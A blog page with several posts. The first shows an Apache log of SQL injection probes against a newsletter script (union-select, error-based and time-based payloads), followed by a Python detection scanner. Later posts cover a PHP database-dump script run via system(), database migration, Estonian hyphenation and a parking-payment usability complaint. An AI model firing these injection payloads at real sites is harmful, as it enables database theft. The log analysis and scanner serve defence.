176.10.100.229 - - [06/Jun/2014:14:20:26 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:27 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:27 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cdatabase%28%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%27%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%27%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20concat%28version%28%29%2C0x7233646D3076335F73716C5F696E6A656374696F6E%29%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bChar%28110%29%2bChar%28106%29%2bChar%28101%29%2bChar%2899%29%2bChar%28116%29%2bChar%28105%29%2bChar%28111%29%2bChar%28110%29%20as%20nvarchar%284000%29%29%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:38 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cchr%28114%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28109%29%7C%7Cchr%2848%29%7C%7Cchr%28118%29%7C%7Cchr%2851%29%7C%7Cchr%2895%29%7C%7Cchr%28104%29%7C%7Cchr%28118%29%7C%7Cchr%28106%29%7C%7Cchr%2895%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28106%29%7C%7Cchr%28101%29%7C%7Cchr%2899%29%7C%7Cchr%28116%29%7C%7Cchr%28105%29%7C%7Cchr%28111%29%7C%7Cchr%28110%29%29-- HTTP/1.1" 200 284 

An explanation of 0x31303235343830303536 can be found in “Site has been hacked via SQL Injection”.

In this case it seems we had just an attempt to hack, as id was not the right place to brute yourself in – there was a check for if (!intval($this->id)) and another parameter was required… but no prepared statements, just simple queries with slightly sanitized inputs.
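As an added example (not part of the original post), here is a small Python scanner that parses Apache log lines like the ones above, URL-decodes the query string and flags the probe families seen in the excerpt; the sample lines are constructed with documentation-range IPs, and the id rule mirrors the intval() check mentioned above.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in the same format as the log excerpt above; the IPs are
# documentation-range placeholders, the payloads are the ones shown in the post.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Jun/2014:14:19:54 +0300] "GET /newsletter/index.php?id=41 HTTP/1.1" 200 284
192.0.2.10 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%20or%201%3D1 HTTP/1.1" 200 284
192.0.2.10 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
192.0.2.10 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
192.0.2.10 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284
192.0.2.10 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284
198.51.100.7 - - [06/Jun/2014:14:21:02 +0300] "GET /newsletter/index.php?id=42 HTTP/1.1" 200 310
"""

# Apache common/combined log line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Indicators of the probe families visible in the post, matched against the
# URL-decoded parameter value so that %27/%20 encoding cannot hide them.
SQLI_INDICATORS = {
    "tautology": re.compile(r"\b(?:or|and)\s+'?\w+'?\s*[=>]\s*'?\w+", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "time-based": re.compile(r"\bwaitfor\s+delay\b|\bbenchmark\s*\(", re.I),
    "error-based": re.compile(r"\bconvert\s*\(\s*int\s*,|information_schema", re.I),
}

def parse_line(line):
    """Split one log line into fields and decode its query parameters."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["params"] = dict(parse_qsl(urlsplit(rec["target"]).query,
                                   keep_blank_values=True))
    return rec

def classify(params):
    """Return labels such as 'id:union-select' for every suspicious parameter.
    A numeric id (the intval() case from the post) must contain only digits."""
    hits = []
    for name, value in params.items():
        for label, rx in SQLI_INDICATORS.items():
            if rx.search(value):
                hits.append(f"{name}:{label}")
        if name == "id" and not value.isdigit():
            hits.append("id:non-numeric")
    return hits

def scan(log_text):
    """Aggregate per client IP. One constant response size across all flagged
    requests (284 in the post) hints that the payloads changed nothing in the
    output; it is a hint only, and says nothing about time-based probes."""
    per_ip = defaultdict(lambda: {"requests": 0, "flagged": 0,
                                  "labels": set(), "flagged_sizes": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per_ip[rec["ip"]]
        entry["requests"] += 1
        hits = classify(rec["params"])
        if hits:
            entry["flagged"] += 1
            entry["labels"].update(hits)
            entry["flagged_sizes"].add(rec["size"])
    return dict(per_ip)
```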

Brrrr… must remove all non-cared-for code.

Posted in category cybercrime | Comments closed

moving data from MS SQL to MySQL, on OSX

When I have had to move data from Microsoft SQL Server to MySQL I have used the MySQL Workbench data migration wizard – well, presumably used, as there has never been enough time to document the process. But as I spent several hours today trying to rebuild the setup and ended up using RazorSQL (in the last 15 minutes)… some notes for future me googling the same problem.

  • MySQL Workbench requires ODBC for connecting to MS SQL; the easiest solution on OSX seems to be OpenLink’s ODBC driver, which has a 2×14-day trial license (simple installation and configuration).
  • BUT apparently MySQL Workbench requires “View Any Definition” rights for the db user, missing from the hosted solution I had to access. There is a bug report describing the problem and a tutorial video explaining the minimal rights, but in my case neither helped.
  • BTW, Oracle user registration – required to comment on the bug – seems to be the worst signup I have ever met, doing crazy stuff like replacing the repeat-password field contents with ***** (yes, 5 asterisks) after moving to the next field and being unable to accept auto-fill data. (While looking for a solution I also started downloading Microsoft SQL Server Express – and had another unforgettable experience, being told on Microsoft ID registration that my password is too long, the max being 16 chars…).

And with RazorSQL?

  • download trial
  • use bundled JDBC connector
  • create connection
  • select DBO
  • DB Tools -> Database Conversion -> Convert multiple tables

The resulting SQL was pretty importable using phpMyAdmin – with the exception of some blob fields that had been marked “not null” for no good reason in MS SQL… And you need to import the data first and then enforce the constraints.


dumping databases, sometimes with forced latin1

This script dates back to when I needed to dump a MySQL database accessed by some legacy app that decided to connect as latin1 but send data as utf8 – meaning that dumping it with the usual phpMyAdmin (which connects as utf8) resulted in a file that failed to import properly. Well, it did import, but the contents were double-utf8’ed … so at least part of the characters were interpreted incorrectly and I spent hours if not days trying to understand why all character conversion libraries completely failed on my input.

So now, whenever I need to dump a MySQL database produced by an unfriendly application, I do it from the command line and twice – as utf8 and as latin1 – deciding later whichever dump works better. And as it happens FTP access is much easier to get than SSH… and you can find a config with SQL access pretty easily… I don’t even bother with anything else – I just upload humpty-dump.php, configure some access variables and hit it from the web side (well, I do take care to rename it before uploading and delete it afterwards, just in case you wonder about the security implications :-).
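As an added example (not the post's own code), here is a Python simulation of the latin1/utf8 mismatch described above, plus a check and a repair for a dump that is already double-encoded; Python's latin-1 codec stands in for MySQL's latin1, which is an assumption noted in the code.

```python
# Added example, not from the original post: simulates the "double-utf8" dump
# problem and repairs dumps that already suffer from it.

def server_stores(text):
    """The legacy app sends UTF-8 bytes over a connection declared as latin1;
    the server keeps them byte for byte in a latin1 column."""
    return text.encode("utf-8")

def dump_as(stored, connection_charset):
    """What a dump client receives: the server converts the latin1 column into
    the connection charset. latin1 passes the bytes through unchanged; utf8
    re-encodes every byte as its own two-byte UTF-8 sequence (double encoding).
    Assumption: Python's latin-1 codec stands in for MySQL's latin1; they
    differ only in the 0x80-0x9F range, which MySQL maps like cp1252."""
    if connection_charset == "latin1":
        return stored
    return stored.decode("latin-1").encode("utf-8")

def looks_double_encoded(data):
    """Heuristic check on a dump: valid UTF-8 whose characters all fit in
    latin-1 and which, reinterpreted that way, is again valid UTF-8 with
    non-ASCII content is almost certainly double-encoded."""
    try:
        text = data.decode("utf-8")
        repaired = text.encode("latin-1").decode("utf-8")
    except UnicodeError:
        return False
    return repaired != text and any(ord(c) > 127 for c in repaired)

def repair_double_utf8(data):
    """Undo one extra layer of UTF-8 encoding (what --default-character-set=latin1
    avoids in the first place)."""
    return data.decode("utf-8").encode("latin-1").decode("utf-8")
```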

AND, as I sometimes also need to grab database dumps from WordPress installs with only FTP access (being unwilling to bother with installing a database-management plugin)… here comes humpty-dump.php:


<?php

// dump database - either using WordPress config from same directory or locally configured parameters
// v 1.2 (2012-11-25) Peeter Marvet, http://tehnokratt.net

if ( is_file( dirname( __FILE__ ) . '/wp-config.php' ) ) {

    // reuse the WordPress credentials: DB_NAME, DB_USER, DB_PASSWORD, DB_HOST, DB_CHARSET
    include( dirname( __FILE__ ) . '/wp-config.php' );

} else {

    define('DB_NAME', 'name');
    define('DB_USER', 'user');
    define('DB_PASSWORD', 'pass');
    define('DB_HOST', 'localhost');
    define('DB_CHARSET', 'utf8'); // NB! use latin1 on legacy systems that tend to produce unreadable dumps from phpmyadmin!

}

$backupFile = DB_NAME . "_" . date("Y-m-d-H-i-s");
$command = "mysqldump --opt ";

if ( defined ('DB_CHARSET') ) {
    // charset of the dump connection - this is what decides between a readable and a double-encoded dump
    $command .= "--default-character-set=" . escapeshellarg( DB_CHARSET ) . " ";
    $backupFile .= "_" . DB_CHARSET;
}

$backupFile .= '.gz';

// quote every value, so spaces or shell metacharacters in the password cannot break the command line
$command .= "--host=" . escapeshellarg( DB_HOST ) . " --user=" . escapeshellarg( DB_USER ) . " --password=" . escapeshellarg( DB_PASSWORD ) . " " . escapeshellarg( DB_NAME ) . " | gzip > " . escapeshellarg( $backupFile );

echo "Dumping <strong>" . DB_NAME . "</strong> on <strong>" . DB_HOST . "</strong>... ";

// system() passes mysqldump's messages straight to the browser; $status is the exit code of the pipeline (gzip's, as it runs last)
system( $command, $status );

echo ( $status === 0 ) ? 'Done! ' : "Pipeline exited with status $status. ";
echo 'Grab it before it rots: <a href="http://' . $_SERVER['SERVER_NAME'] . '/' . $backupFile . '">' . $backupFile . '</a>';

?>


Estonian-language hyphenation for web text

Soon all browsers will have CSS3 hyphenation support… but until then hyphenator.js does the job, recommended among others by Richard Fink in the article The Look That Says Book. I happen to be preparing veebiakadeemia.ee for the upcoming broadcast season, and the lack of hyphenation made the text in a narrow column unpleasantly ragged.

A quick googling gave no results at all for Estonian web hyphenation, so among other things I had to create an et.js hyphenation pattern for hyphenator.js, based on Enn Saar's TeX pattern, and … that's how simple it was :-) Enn allowed the result to be released under the LGPL and hopefully it will soon make it into the official hyphenator.js distribution; until then you can ask me for a preliminary version by e-mail … or use the generator at tehnokratt.net/hyphenator/mergeAndPack.html.

Getting started is dead simple:

  • Hyphenator ships with mergeAndPack.html, which packs the hyphenator, the required language modules and the settings neatly into a single minified JavaScript file (note, though, that mergeAndPack does not work when opened straight from disk; for security reasons it expects to be run from a web server, and tehnokratt.net/hyphenator/mergeAndPack.html can help there)
  • Tick the languages you want there, tune the hyphenation aggressiveness if needed and add the class that should be hyphenated (by default it is assumed that you add the class hyphenate to content that needs hyphenating; in my theme here, built on Thematic, entry-content works quite well); for now it is best not to enable CSS3 hyphenation support (the bug has been reported), because at least Firefox 3.6 users get an error message in that case (you could of course also accept that they have to read unhyphenated text and simply change the onError function to {}, i.e. one that does not output an error message).
  • The result is a text that you can copy into a file, e.g. hyphenator-et.js.
  • For WordPress, drop it into your theme directory, and after adding the following two lines to functions.php everything should work:
wp_register_script( 'hyphenator', ( get_stylesheet_directory_uri() . "/hyphenator-et.js" ), false, '4.0.0' );
wp_enqueue_script( 'hyphenator' );

as a warm-up for World Usability Day 2011, m-parking takes the stage

World Usability Day falls this time on the especially magical date of 11.11.11, and as it happens I have the honour of moderating the usability day event held at Tallinn University to celebrate it (which, judging by the speaker list, will be mostly in English, as befits a world day). And since the organising committee meets today, and I have a few more loosely usability-related jobs ahead this week, a bit of a warm-up is in order.

Namely, last week I got … probably my first parking fine of the year. Thanks to an Android app called MoPa, the cases where, in a hurry, I forget to start parking have decreased considerably, and so have the overpayments from a timer left ticking. But last week it so happened that m-parking, at least on the Elisa network, was not working, so the message went out at 8:25 but no reply came. As a regular user I stopped watching the reply messages long ago, because 99% of the time they contain nothing important, and the trouble only surfaced when I saw the ticket. Actually, at 12:08 a notice arrived too that m-parking was not working… but by then I knew that myself.

So in m-parking we have a nice mass-market application that, among other things:

  • does not give adequate information when it is not working
  • produces information noise for the regular user
  • is inconvenient enough that an app is needed to make it usable (among other things to avoid forgetting, i.e. overpaying)
  • has as its only API that same noisy/intermittently failing SMS (the MoPa app could probably be improved by watching the SMSes and raising the alarm when they do not match expectations, but obviously somebody would have to pay some money for that, and probably more than can be had from the app store)
  • apparently also lacks a contractual clause for the parking service provider that would stipulate user-friendly problem resolution for when the service is not working

When the system is known to be down, the parking operator's call centre could of course help by cancelling the fines in a simplified procedure; unfortunately they are quick to explain that it is naturally my job to read through the SMSes and monitor their regular arrival… rather than their job being to keep the payment systems working. This has come up before, by the way (cheers, Karol). For a shopping centre, the payment-outage time after which people leave fully loaded shopping carts in the aisle and walk out is supposedly around 10 minutes, which creates a lot of trouble and effectively makes the seller responsible for e-payments working. For parking… well, actually there is a similar solution, as the comments show:

For the sake of truth, let me also add Mart's later comment, that is, what causes anger above all is the customer relationship at the moment one manages to get a fine:

By the way, I have always paid Europark for parking. Let them earn too, I don't mind. But these “fines” are an outrage: mindlessly high, like ambushing the customer: “Aha, CAUGHT YOU! Now we're really going to SCREW you!!!” The customer may simply have forgotten, or m-parking was not working, or whatever. So if I should ever get one of these fines, I will flatly not pay it and won't feel bad about it at all.

And for the sake of truth let me also add that I have discussed the topic with EuroPark, and deep down they themselves are also of the opinion that harassing customers is not sensible business, and they try to resolve appeals sensibly. My appeal this time will surely go the same way, i.e. everything will turn out fine … but then I happened to fill in that appeal online and … unfortunately this thing belongs in a textbook:

First it is nice to enter the appeal number (which, by the way, contains the inspector's ID, the date and the time) and then add that same information neatly field by field, at the same time helping the parking operator remember exactly where zone EP25 is and what was written on the ticket. Apparently even that is not enough, since someone has suddenly decided to check which city we are even talking about.

And then comes a batch of items that are presumably meant to make the appellant give up their intention: did you really pay, did you do it immediately, did you get the reply message, etc. For the SUBSTANTIVE PART of the appeal, i.e. my explanation, a tiny little box is left.

Next… Guess what happens when I decide to send the appeal off? Naturally I get an error message:

Mmmm… the whole problem is precisely that your payment system was not working and did not send a reply, which I duly marked with the corresponding radio button, right? From there on I am shown a confirmation popup where my text is jumbled up with all sorts of technical information (at the top there was, among other things, MAX_FILE_SIZE 8000000) and a button to print it:

… and at least on OSX+Chrome, pressing the Print button results in the following:

I am not going to tack any moral onto this, although I would dearly like to impose a user-side contractual penalty on software developers. Oh right, we just discussed at length that a fine is not the solution either…

So let's simply return to the beginning of the story: 11.11.11 is usability day, and the topic of the event organised for the occasion is usability in the software development process. But the event is of little use if only user-interaction fans of every stripe turn up; what is needed are more of those who make mistakes by not thinking about the user.

  • The last column

    I am Peeter Marvet (pets@tehnokratt.net). It cannot be entirely ruled out that this here was once my blog. What is written here may not express standpoints (or sitting points). Due to the recession, the front page volume has been reduced by 8%. VAT is added; for Tallinn residents also sales and boat tax. Packaged in a protective atmosphere. Made on a computer that may contain small amounts of milk and nut pieces. Contains no hydrogenated (trans-fat-free) vegetable fatty acids; contains whipped nitrogen.